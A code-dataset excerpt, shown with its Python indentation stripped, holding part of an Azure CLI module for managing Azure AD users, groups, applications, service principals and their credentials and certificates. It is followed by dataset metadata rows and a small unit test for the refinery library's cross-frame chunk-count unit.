sub_filters.append(query_filter)
if spn:
sub_filters.append("servicePrincipalNames/any(c:c eq '{}')".format(spn))
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
result = client.service_principals.list(filter=(' and '.join(sub_filters)))
if sub_filters or include_all:
return result
else:
result = list(itertools.islice(result, 101))
if len(result) == 101:
logger.warning("The result is not complete. You can still use '--all' to get all of them with"
" long latency expected, or provide a filter through command arguments")
return result[:100]
def list_owned_objects(client, object_type=None):
result = client.list_owned_objects()
if object_type:
result = [r for r in result if r.object_type and r.object_type.lower() == object_type.lower()]
return result
def list_users(client, upn=None, display_name=None, query_filter=None):
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if upn:
sub_filters.append("userPrincipalName eq '{}'".format(upn))
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
return client.list(filter=(' and ').join(sub_filters))
def create_user(client, user_principal_name, display_name, password,
mail_nickname=None, immutable_id=None, force_change_password_next_login=False):
'''
:param mail_nickname: mail alias. default to user principal name
'''
mail_nickname = mail_nickname or user_principal_name.split('@')[0]
param = UserCreateParameters(user_principal_name=user_principal_name, account_enabled=True,
display_name=display_name, mail_nickname=mail_nickname,
immutable_id=immutable_id,
password_profile=PasswordProfile(
password=password,
force_change_password_next_login=force_change_password_next_login))
return client.create(param)
def get_user_member_groups(cmd, upn_or_object_id, security_enabled_only=False):
graph_client = _graph_client_factory(cmd.cli_ctx)
if not _is_guid(upn_or_object_id):
upn_or_object_id = graph_client.users.get(upn_or_object_id).object_id
results = list(graph_client.users.get_member_groups(
upn_or_object_id, security_enabled_only=security_enabled_only))
try:
stubs = _get_object_stubs(graph_client, results)
except GraphErrorException:
stubs = []
stubs = {s.object_id: s.display_name for s in stubs}
return [{'objectId': x, 'displayName': stubs.get(x)} for x in results]
def create_group(cmd, display_name, mail_nickname):
graph_client = _graph_client_factory(cmd.cli_ctx)
group = graph_client.groups.create(GroupCreateParameters(display_name=display_name,
mail_nickname=mail_nickname))
# TODO: uncomment once design reviewed with AAD team
# _set_owner(cmd.cli_ctx, graph_client, group.object_id, graph_client.groups.add_owner)
return group
def check_group_membership(cmd, client, group_id, member_object_id): # pylint: disable=unused-argument
return client.is_member_of(CheckGroupMembershipParameters(group_id=group_id,
member_id=member_object_id))
def list_groups(client, display_name=None, query_filter=None):
'''
list groups in the directory
'''
sub_filters = []
if query_filter:
sub_filters.append(query_filter)
if display_name:
sub_filters.append("startswith(displayName,'{}')".format(display_name))
return client.list(filter=(' and ').join(sub_filters))
def list_group_owners(cmd, group_id):
client = _graph_client_factory(cmd.cli_ctx).groups
return client.list_owners(_resolve_group(client, group_id))
def add_group_owner(cmd, owner_object_id, group_id):
graph_client = _graph_client_factory(cmd.cli_ctx)
owner_url = _get_owner_url(cmd.cli_ctx, owner_object_id)
return graph_client.groups.add_owner(_resolve_group(graph_client.groups, group_id), owner_url)
def remove_group_owner(cmd, owner_object_id, group_id):
client = _graph_client_factory(cmd.cli_ctx).groups
return client.remove_owner(_resolve_group(client, group_id), owner_object_id)
def _resolve_group(client, identifier):
if not _is_guid(identifier):
res = list(list_groups(client, display_name=identifier))
if not res:
raise CLIError('Group {} is not found in Graph '.format(identifier))
if len(res) != 1:
raise CLIError('More than 1 group objects has the display name of ' + identifier)
identifier = res[0].object_id
return identifier
def create_application(cmd, display_name, homepage=None, identifier_uris=None,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None,
oauth2_allow_implicit_flow=None, required_resource_accesses=None, native_app=None,
credential_description=None):
graph_client = _graph_client_factory(cmd.cli_ctx)
key_creds, password_creds, required_accesses = None, None, None
if native_app:
if identifier_uris:
raise CLIError("'--identifier-uris' is not required for creating a native application")
identifier_uris = ['http://{}'.format(_gen_guid())] # we will create a temporary one and remove it later
else:
if not identifier_uris:
raise CLIError("'--identifier-uris' is required for creating an application")
password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage,
start_date, end_date, credential_description)
if required_resource_accesses:
required_accesses = _build_application_accesses(required_resource_accesses)
app_patch_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
oauth2_allow_implicit_flow=oauth2_allow_implicit_flow,
required_resource_access=required_accesses)
try:
result = graph_client.applications.create(app_patch_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
if native_app:
# AAD graph doesn't have the API to create a native app, aka public client, the recommended hack is
# to create a web app first, then convert to a native one
# pylint: disable=protected-access
if 'public_client' not in ApplicationUpdateParameters._attribute_map:
ApplicationUpdateParameters._attribute_map['public_client'] = {'key': 'publicClient', 'type': 'bool'}
app_patch_param = ApplicationUpdateParameters(identifier_uris=[])
setattr(app_patch_param, 'public_client', True)
graph_client.applications.patch(result.object_id, app_patch_param)
result = graph_client.applications.get(result.object_id)
return result
def list_permissions(cmd, identifier):
# the important and hard part is to tell users which permissions have been granted.
# we will due diligence to dig out what matters
graph_client = _graph_client_factory(cmd.cli_ctx)
# first get the permission grant history
client_sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
grant_info = graph_client.oauth2.get(
filter="clientId eq '{}'".format(client_sp_object_id)) # pylint: disable=no-member
grant_histories = grant_info.additional_properties['value']
# get original permissions required by the application, we will cross check the history
# and mark out granted ones
graph_client = _graph_client_factory(cmd.cli_ctx)
application = show_application(graph_client.applications, identifier)
permissions = application.required_resource_access
for p in permissions:
result = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(p.resource_app_id)))
granted_times = 'N/A'
if result:
granted_times = ', '.join([x['startTime'] for x in grant_histories if
x['resourceId'] == result[0].object_id])
setattr(p, 'grantedTime', granted_times)
return permissions
def add_permission(cmd, identifier, api, api_permissions):
graph_client = _graph_client_factory(cmd.cli_ctx)
application = show_application(graph_client.applications, identifier)
existing = application.required_resource_access
resource_accesses = []
for e in api_permissions:
access_id, access_type = e.split('=')
resource_accesses.append(ResourceAccess(id=access_id, type=access_type))
required_resource_access = RequiredResourceAccess(resource_app_id=api,
resource_access=resource_accesses)
existing.append(required_resource_access)
update_parameter = ApplicationUpdateParameters(required_resource_access=existing)
graph_client.applications.patch(application.object_id, update_parameter)
logger.warning('Invoking "az ad app permission grant --id %s --api %s" is needed to make the '
'change effective', identifier, api)
def delete_permission(cmd, identifier, api):
graph_client = _graph_client_factory(cmd.cli_ctx)
application = show_application(graph_client.applications, identifier)
existing_accesses = application.required_resource_access
existing_accesses = [e for e in existing_accesses if e.resource_app_id != api]
update_parameter = ApplicationUpdateParameters(required_resource_access=existing_accesses)
return graph_client.applications.patch(application.object_id, update_parameter)
def grant_application(cmd, identifier, api, expires='1', scope='user_impersonation'):
graph_client = _graph_client_factory(cmd.cli_ctx)
# Get the Service Principal ObjectId for the client app
client_sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
# Get the Service Principal ObjectId for associated app
associated_sp_object_id = _resolve_service_principal(graph_client.service_principals, api)
# Build payload
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=1)
if expires.lower() == 'never':
end_date = start_date + relativedelta(years=1000)
else:
try:
end_date = start_date + relativedelta(years=int(expires))
except ValueError:
raise CLIError('usage error: --expires <INT>|never')
payload = {
"odata.type": "Microsoft.DirectoryServices.OAuth2PermissionGrant",
"clientId": client_sp_object_id,
"consentType": "AllPrincipals",
"resourceId": associated_sp_object_id,
"scope": scope,
"startTime": start_date.isoformat(),
"expiryTime": end_date.isoformat()
}
# Grant OAuth2 permissions
response = graph_client.oauth2.grant(payload) # pylint: disable=no-member
return response
def update_application(instance, display_name=None, homepage=None, # pylint: disable=unused-argument
identifier_uris=None, password=None, reply_urls=None, key_value=None,
key_type=None, key_usage=None, start_date=None, end_date=None, available_to_other_tenants=None,
oauth2_allow_implicit_flow=None, required_resource_accesses=None):
from azure.cli.core.commands.arm import make_camel_case, make_snake_case
password_creds, key_creds, required_accesses = None, None, None
if any([password, key_value]):
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
if required_resource_accesses:
required_accesses = _build_application_accesses(required_resource_accesses)
# Workaround until https://github.com/Azure/azure-rest-api-specs/issues/3437 is fixed
def _get_property(name):
try:
return getattr(instance, make_snake_case(name))
except AttributeError:
return instance.additional_properties.get(make_camel_case(name), None)
app_patch_param = ApplicationUpdateParameters(
display_name=display_name or _get_property('display_name'),
homepage=homepage or _get_property('homepage'),
identifier_uris=identifier_uris or _get_property('identifier_uris'),
reply_urls=reply_urls or _get_property('reply_urls'),
key_credentials=key_creds or None,
password_credentials=password_creds or None,
available_to_other_tenants=available_to_other_tenants or _get_property('available_to_other_tenants'),
required_resource_access=required_accesses or _get_property('required_resource_access'),
oauth2_allow_implicit_flow=oauth2_allow_implicit_flow or _get_property('oauth2_allow_implicit_flow'))
return app_patch_param
def patch_application(cmd, identifier, parameters):
graph_client = _graph_client_factory(cmd.cli_ctx)
object_id = _resolve_application(graph_client.applications, identifier)
return graph_client.applications.patch(object_id, parameters)
def _build_application_accesses(required_resource_accesses):
required_accesses = None
for x in required_resource_accesses:
accesses = [ResourceAccess(id=y['id'], type=y['type']) for y in x['resourceAccess']]
if required_accesses is None:
required_accesses = []
required_accesses.append(RequiredResourceAccess(resource_app_id=x['resourceAppId'],
resource_access=accesses))
return required_accesses
def show_application(client, identifier):
object_id = _resolve_application(client, identifier)
return client.get(object_id)
def delete_application(client, identifier):
object_id = _resolve_application(client, identifier)
client.delete(object_id)
def _resolve_application(client, identifier):
result = list(client.list(filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result:
if _is_guid(identifier):
# it is either app id or object id, let us verify
result = list(client.list(filter="appId eq '{}'".format(identifier)))
else:
raise CLIError("Application '{}' doesn't exist".format(identifier))
return result[0].object_id if result else identifier
def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None,
start_date=None, end_date=None, key_description=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
custom_key_id = None
if key_description and password:
custom_key_id = _encode_custom_key_description(key_description)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(_gen_guid()),
value=password, custom_key_identifier=custom_key_id)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, key_id=str(_gen_guid()), value=key_value,
usage=key_usage, type=key_type, custom_key_identifier=custom_key_id)]
return (password_creds, key_creds)
def create_service_principal(cmd, identifier):
return _create_service_principal(cmd.cli_ctx, identifier)
def _create_service_principal(cli_ctx, identifier, resolve_app=True):
client = _graph_client_factory(cli_ctx)
app_id = identifier
if resolve_app:
if _is_guid(identifier):
result = list(client.applications.list(filter="appId eq '{}'".format(identifier)))
else:
result = list(client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
try:
if not result: # assume we get an object id
result = [client.applications.get(identifier)]
app_id = result[0].app_id
except GraphErrorException:
pass # fallback to appid (maybe from an external tenant?)
return client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def delete_service_principal(cmd, identifier):
client = _graph_client_factory(cmd.cli_ctx)
sp_object_id = _resolve_service_principal(client.service_principals, identifier)
app_object_id = _get_app_object_id_from_sp_object_id(client, sp_object_id)
assignments = list_role_assignments(cmd, assignee=identifier, show_all=True)
if assignments:
logger.warning('Removing role assignments')
delete_role_assignments(cmd, [a['id'] for a in assignments])
if app_object_id: # delete the application, and AAD service will automatically clean up the SP
client.applications.delete(app_object_id)
else:
client.service_principals.delete(sp_object_id)
def _get_app_object_id_from_sp_object_id(client, sp_object_id):
sp = client.service_principals.get(sp_object_id)
app_object_id = None
if sp.service_principal_names:
result = list(client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(sp.service_principal_names[0])))
if result:
app_object_id = result[0].object_id
return app_object_id
def list_service_principal_owners(cmd, identifier):
client = _graph_client_factory(cmd.cli_ctx)
sp_object_id = _resolve_service_principal(client.service_principals, identifier)
return client.service_principals.list_owners(sp_object_id)
def list_service_principal_credentials(cmd, identifier, cert=False):
graph_client = _graph_client_factory(cmd.cli_ctx)
if " sp " in cmd.name:
sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
app_object_id = _get_app_object_id_from_sp_object_id(graph_client, sp_object_id)
else:
app_object_id = _resolve_application(graph_client.applications, identifier)
return _get_service_principal_credentials(graph_client, app_object_id, cert)
def _get_service_principal_credentials(graph_client, app_object_id, cert=False):
if cert:
app_creds = list(graph_client.applications.list_key_credentials(app_object_id))
else:
app_creds = list(graph_client.applications.list_password_credentials(app_object_id))
return app_creds
def delete_service_principal_credential(cmd, identifier, key_id, cert=False):
graph_client = _graph_client_factory(cmd.cli_ctx)
if " sp " in cmd.name:
sp_object_id = _resolve_service_principal(graph_client.service_principals, identifier)
app_object_id = _get_app_object_id_from_sp_object_id(graph_client, sp_object_id)
else:
app_object_id = _resolve_application(graph_client.applications, identifier)
result = _get_service_principal_credentials(graph_client, app_object_id, cert)
to_delete = next((x for x in result if x.key_id == key_id), None)
if to_delete:
result.remove(to_delete)
if cert:
return graph_client.applications.update_key_credentials(app_object_id, result)
return graph_client.applications.update_password_credentials(app_object_id, result)
else:
raise CLIError("'{}' doesn't exist in the service principal of '{}' or associated application".format(
key_id, identifier))
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
if _is_guid(identifier):
return identifier # assume an object id
else:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def _process_service_principal_creds(cli_ctx, years, app_start_date, app_end_date, cert, create_cert,
password, keyvault):
if not any((cert, create_cert, password, keyvault)):
# 1 - Simplest scenario. Use random password
return str(_gen_guid()), None, None, None, None
if password:
# 2 - Password supplied -- no certs
return password, None, None, None, None
# The rest of the scenarios involve certificates
public_cert_string = None
cert_file = None
if cert and not keyvault:
# 3 - User-supplied public cert data
logger.debug("normalizing x509 certificate with fingerprint %s", cert.digest("sha1"))
cert_start_date = dateutil.parser.parse(cert.get_notBefore().decode())
cert_end_date = dateutil.parser.parse(cert.get_notAfter().decode())
public_cert_string = _get_public(cert)
elif create_cert and not keyvault:
# 4 - Create local self-signed cert
public_cert_string, cert_file, cert_start_date, cert_end_date = \
_create_self_signed_cert(app_start_date, app_end_date)
elif create_cert and keyvault:
# 5 - Create self-signed cert in KeyVault
public_cert_string, cert_file, cert_start_date, cert_end_date = \
_create_self_signed_cert_with_keyvault(cli_ctx, years, keyvault, cert)
elif keyvault:
# 6 - Use existing cert from KeyVault
kv_client = _get_keyvault_client(cli_ctx)
vault_base = 'https://{}{}/'.format(keyvault, cli_ctx.cloud.suffixes.keyvault_dns)
cert_obj = kv_client.get_certificate(vault_base, cert, '')
public_cert_string = base64.b64encode(cert_obj.cer).decode('utf-8') # pylint: disable=no-member
cert_start_date = cert_obj.attributes.not_before # pylint: disable=no-member
cert_end_date = cert_obj.attributes.expires # pylint: disable=no-member
return (password, public_cert_string, cert_file, cert_start_date, cert_end_date)
def _validate_app_dates(app_start_date, app_end_date, cert_start_date, cert_end_date):
if not cert_start_date and not cert_end_date:
return app_start_date, app_end_date, None, None
if cert_start_date > app_start_date:
logger.warning('Certificate is not valid until %s. Adjusting SP start date to match.',
cert_start_date)
app_start_date = cert_start_date + datetime.timedelta(seconds=1)
if cert_end_date < app_end_date:
logger.warning('Certificate expires %s. Adjusting SP end date to match.',
cert_end_date)
app_end_date = cert_end_date - datetime.timedelta(seconds=1)
return (app_start_date, app_end_date, cert_start_date, cert_end_date)
# pylint: disable=inconsistent-return-statements
def create_service_principal_for_rbac(
# pylint:disable=too-many-statements,too-many-locals, too-many-branches
cmd, name=None, password=None, years=None, create_cert=False, cert=None, scopes=None, role='Contributor',
show_auth_for_sdk=None, skip_assignment=False, keyvault=None):
import time
graph_client = _graph_client_factory(cmd.cli_ctx)
role_client = _auth_client_factory(cmd.cli_ctx).role_assignments
scopes = scopes or ['/subscriptions/' + role_client.config.subscription_id]
years = years or 1
sp_oid = None
_RETRY_TIMES = 36
app_display_name = None
if name and '://' not in name:
prefix = "http://"
app_display_name = name
logger.warning('Changing "%s" to a valid URI of "%s%s", which is the required format'
' used for service principal names', name, prefix, name)
name = prefix + name # normalize be a valid graph service principal name
if name:
query_exp = 'servicePrincipalNames/any(x:x eq \'{}\')'.format(name)
aad_sps = list(graph_client.service_principals.list(filter=query_exp))
if aad_sps:
raise CLIError("'{}' already exists.".format(name))
app_display_name = name.split('://')[-1]
app_start_date = datetime.datetime.now(TZ_UTC)
app_end_date = app_start_date + relativedelta(years=years or 1)
app_display_name = app_display_name or ('azure-cli-' +
app_start_date.strftime('%Y-%m-%d-%H-%M-%S'))
if name is None:
name = 'http://' + app_display_name # just a valid uri, no need to exist
password, public_cert_string, cert_file, cert_start_date, cert_end_date = \
_process_service_principal_creds(cmd.cli_ctx, years, app_start_date, app_end_date, cert, create_cert,
password, keyvault)
app_start_date, app_end_date, cert_start_date, cert_end_date = \
_validate_app_dates(app_start_date, app_end_date, cert_start_date, cert_end_date)
aad_application = create_application(cmd,
display_name=app_display_name,
homepage='https://' + app_display_name,
identifier_uris=[name],
available_to_other_tenants=False,
password=password,
key_value=public_cert_string,
start_date=app_start_date,
end_date=app_end_date,
credential_description='rbac')
# pylint: disable=no-member
app_id = aad_application.app_id
# retry till server replication is done
for l in range(0, _RETRY_TIMES):
try:
aad_sp = _create_service_principal(cmd.cli_ctx, app_id, resolve_app=False)
break
except Exception as ex: # pylint: disable=broad-except
if l < _RETRY_TIMES and (
' does not reference ' in str(ex) or ' does not exist ' in str(ex)):
time.sleep(5)
logger.warning('Retrying service principal creation: %s/%s', l + 1, _RETRY_TIMES)
else:
logger.warning(
"Creating service principal failed for appid '%s'. Trace followed:\n%s",
name, ex.response.headers if hasattr(ex,
'response') else ex) # pylint: disable=no-member
raise
sp_oid = aad_sp.object_id
# TODO: uncomment once design reviewed with AAD team
# _set_owner(cmd.cli_ctx, graph_client, aad_application.object_id, graph_client.applications.add_owner)
# retry while server replication is done
if not skip_assignment:
for scope in scopes:
for l in range(0, _RETRY_TIMES):
try:
_create_role_assignment(cmd.cli_ctx, role, sp_oid, None, scope, resolve_assignee=False)
break
except Exception as ex:
if l < _RETRY_TIMES and ' does not exist in the directory ' in str(ex):
time.sleep(5)
logger.warning('Retrying role assignment creation: %s/%s', l + 1,
_RETRY_TIMES)
continue
else:
# dump out history for diagnoses
logger.warning('Role assignment creation failed.\n')
if getattr(ex, 'response', None) is not None:
logger.warning('role assignment response headers: %s\n',
ex.response.headers) # pylint: disable=no-member
raise
if show_auth_for_sdk:
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cmd.cli_ctx)
result = profile.get_sp_auth_info(scopes[0].split('/')[2] if scopes else None,
app_id, password, cert_file)
# sdk-auth file should be in json format all the time, hence the print
print(json.dumps(result, indent=2))
return
result = {
'appId': app_id,
'password': password,
'name': name,
'displayName': app_display_name,
'tenant': graph_client.config.tenant_id
}
if cert_file:
logger.warning(
"Please copy %s to a safe place. When run 'az login' provide the file path to the --password argument",
cert_file)
result['fileWithCertAndPrivateKey'] = cert_file
return result
def _get_signed_in_user_object_id(graph_client):
try:
return graph_client.signed_in_user.get().object_id
except GraphErrorException: # error could be possible if you logged in as a service principal
pass
def _get_keyvault_client(cli_ctx):
from azure.cli.core._profile import Profile
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def _get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
return KeyVaultClient(KeyVaultAuthentication(_get_token), api_version=version)
def _create_self_signed_cert(start_date, end_date): # pylint: disable=too-many-locals
from os import path
import tempfile
from OpenSSL import crypto
from datetime import timedelta
_, cert_file = tempfile.mkstemp()
_, key_file = tempfile.mkstemp()
# create a file with both cert & key so users can use to login
# leverage tempfile ot produce a random file name
_, temp_file = tempfile.mkstemp()
creds_file = path.join(path.expanduser("~"), path.basename(temp_file) + '.pem')
# create a key pair
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, 2048)
# create a self-signed cert
cert = crypto.X509()
subject = cert.get_subject()
# as long it works, we skip fileds C, ST, L, O, OU, which we have no reasonable defaults for
subject.CN = 'CLI-Login'
cert.set_serial_number(1000)
asn1_format = '%Y%m%d%H%M%SZ'
cert_start_date = start_date - timedelta(seconds=1)
cert_end_date = end_date + timedelta(seconds=1)
cert.set_notBefore(cert_start_date.strftime(asn1_format).encode('utf-8'))
cert.set_notAfter(cert_end_date.strftime(asn1_format).encode('utf-8'))
cert.set_issuer(cert.get_subject())
cert.set_pubkey(k)
cert.sign(k, 'sha1')
with open(cert_file, "wt") as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode())
with open(key_file, "wt") as f:
f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode())
cert_string = None
with open(creds_file, 'wt') as cf:
with open(key_file, 'rt') as f:
cf.write(f.read())
with open(cert_file, "rt") as f:
cert_string = f.read()
cf.write(cert_string)
# get rid of the header and tails for upload to AAD: ----BEGIN CERT....----
cert_string = re.sub(r'\-+[A-z\s]+\-+', '', cert_string).strip()
return (cert_string, creds_file, cert_start_date, cert_end_date)
def _create_self_signed_cert_with_keyvault(cli_ctx, years, keyvault, keyvault_cert_name): # pylint: disable=too-many-locals
import time
kv_client = _get_keyvault_client(cli_ctx)
cert_policy = {
'issuer_parameters': {
'name': 'Self'
},
'key_properties': {
'exportable': True,
'key_size': 2048,
'key_type': 'RSA',
'reuse_key': True
},
'lifetime_actions': [{
'action': {
'action_type': 'AutoRenew'
},
'trigger': {
'days_before_expiry': 90
}
}],
'secret_properties': {
'content_type': 'application/x-pkcs12'
},
'x509_certificate_properties': {
'key_usage': [
'cRLSign',
'dataEncipherment',
'digitalSignature',
'keyEncipherment',
'keyAgreement',
'keyCertSign'
],
'subject': 'CN=KeyVault Generated',
'validity_in_months': ((years * 12) + 1)
}
}
vault_base_url = 'https://{}{}/'.format(keyvault, cli_ctx.cloud.suffixes.keyvault_dns)
kv_client.create_certificate(vault_base_url, keyvault_cert_name, cert_policy)
while kv_client.get_certificate_operation(vault_base_url, keyvault_cert_name).status != 'completed': # pylint: disable=no-member, line-too-long
time.sleep(5)
cert = kv_client.get_certificate(vault_base_url, keyvault_cert_name, '')
cert_string = base64.b64encode(cert.cer).decode('utf-8') # pylint: disable=no-member
cert_start_date = cert.attributes.not_before # pylint: disable=no-member
cert_end_date = cert.attributes.expires # pylint: disable=no-member
creds_file = None
return (cert_string, creds_file, cert_start_date, cert_end_date)
def _try_x509_pem(cert):
import OpenSSL.crypto
try:
return OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
except OpenSSL.crypto.Error:
# could not load the pem, try with headers
try:
pem_with_headers = '-----BEGIN CERTIFICATE-----\n' \
+ cert + \
'-----END CERTIFICATE-----\n'
return OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, pem_with_headers)
except OpenSSL.crypto.Error:
return None
except UnicodeEncodeError:
# this must be a binary encoding
return None
def _try_x509_der(cert):
import OpenSSL.crypto
try:
cert = base64.b64decode(cert)
return OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_ASN1, cert)
except OpenSSL.crypto.Error:
return None
def _get_public(x509):
import OpenSSL.crypto
pem = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, x509)
if isinstance(pem, bytes):
pem = pem.decode("utf-8")
stripped = pem.replace('-----BEGIN CERTIFICATE-----\n', '')
stripped = stripped.replace('-----END CERTIFICATE-----\n', '')
return stripped
def reset_service_principal_credential(cmd, name, password=None, create_cert=False, cert=None, years=None,
keyvault=None, append=False, credential_description=None):
client = _graph_client_factory(cmd.cli_ctx)
# pylint: disable=no-member
years = years or 1
# look for the existing application
query_exp = "servicePrincipalNames/any(x:x eq \'{0}\') or displayName eq '{0}'".format(name)
aad_sps = list(client.service_principals.list(filter=query_exp))
if not aad_sps:
raise CLIError("can't find a service principal matching '{}'".format(name))
if len(aad_sps) > 1:
raise CLIError(
'more than one entry matches the name, please provide unique names like '
'app id guid, or app id uri')
app = show_application(client.applications, aad_sps[0].app_id)
app_start_date = datetime.datetime.now(TZ_UTC)
app_end_date = app_start_date + relativedelta(years=years or 1)
# build a new password/cert credential and patch it
public_cert_string = None
cert_file = None
password, public_cert_string, cert_file, cert_start_date, cert_end_date = \
_process_service_principal_creds(cmd.cli_ctx, years, app_start_date, app_end_date, cert, create_cert,
password, keyvault)
app_start_date, app_end_date, cert_start_date, cert_end_date = \
_validate_app_dates(app_start_date, app_end_date, cert_start_date, cert_end_date)
app_creds = None
cert_creds = None
custom_key_identifier = None
if credential_description and password:
custom_key_identifier = _encode_custom_key_description(credential_description)
if password:
app_creds = []
if append:
app_creds = list(client.applications.list_password_credentials(app.object_id))
app_creds.append(PasswordCredential(
start_date=app_start_date,
end_date=app_end_date,
key_id=str(_gen_guid()),
value=password,
custom_key_identifier=custom_key_identifier
))
if public_cert_string:
cert_creds = []
if append:
cert_creds = list(client.applications.list_key_credentials(app.object_id))
cert_creds.append(KeyCredential(
start_date=app_start_date,
end_date=app_end_date,
value=public_cert_string,
key_id=str(_gen_guid()),
usage='Verify',
type='AsymmetricX509Cert',
custom_key_identifier=custom_key_identifier
))
app_create_param = ApplicationUpdateParameters(password_credentials=app_creds, key_credentials=cert_creds)
client.applications.patch(app.object_id, app_create_param)
result = {
'appId': app.app_id,
'password': password,
'name': name,
'tenant': client.config.tenant_id
}
if cert_file:
result['fileWithCertAndPrivateKey'] = cert_file
return result
def _encode_custom_key_description(key_description):
# utf16 is used by AAD portal. Do not change it to other random encoding
# unless you know what you are doing.
return key_description.encode('utf-16')
def _resolve_object_id(cli_ctx, assignee, fallback_to_object_id=False):
client = _graph_client_factory(cli_ctx)
result = None
try:
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
except (CloudError, GraphErrorException):
if fallback_to_object_id and _is_guid(assignee):
return assignee
raise
def _is_guid(guid):
try:
uuid.UUID(guid)
return True
except ValueError:
pass
return False
def _get_object_stubs(graph_client, assignees):
from azure.graphrbac.models import GetObjectsParameters
result = []
assignees = list(assignees) # callers could pass in a set
for i in range(0, len(assignees), 1000):
params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees[i:i + 1000])
result += list(graph_client.objects.get_objects_by_object_ids(params))
return result
def _get_owner_url(cli_ctx, owner_object_id):
if '://' in owner_object_id:
return owner_object_id
graph_url = cli_ctx.cloud.endpoints.active_directory_graph_resource_id
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cli_ctx)
_, _2, tenant_id = profile.get_login_credentials()
return graph_url + tenant_id + '/directoryObjects/' + owner_object_id
def _set_owner(cli_ctx, graph_client, asset_object_id, setter):
signed_in_user_object_id = _get_signed_in_user_object_id(graph_client)
if signed_in_user_object_id:
setter(asset_object_id, _get_owner_url(cli_ctx, signed_in_user_object_id))
# for injecting test seams to produce predicatable role assignment id for playback
def _gen_guid():
return uuid.uuid4()
| 43.910714
| 162
| 0.663715
|
814b9c9d4c1029229b3f42bda4ae24ae473abb9c
| 525
|
py
|
Python
|
test/units/meta/test_xfcc.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | 1
|
2022-02-13T20:57:15.000Z
|
2022-02-13T20:57:15.000Z
|
test/units/meta/test_xfcc.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
test/units/meta/test_xfcc.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .. import TestUnitBase
from refinery.lib.loader import load_pipeline as L
class TestCrossFrameChunkCount(TestUnitBase):
def test_01(self):
pipeline = L('emit ABDF AEC ABE [| rex . [| xfcc ]]')
results = {bytes(chunk): chunk['count'] for chunk in pipeline}
self.assertEqual(results, {
B'A': 3,
B'B': 2,
B'C': 1,
B'D': 1,
B'E': 2,
B'F': 1,
})
| 25
| 71
| 0.497143
|
35d7fd41b62878ea1dc56fef2be88eea1a443cb8
| 38,814
|
py
|
Python
|
userbot/modules/memes.py
|
zankforza/OpenUserBot-2
|
5774471b933c8a6c6f3df12ebf98bf7a7fd8ce3d
|
[
"Naumen",
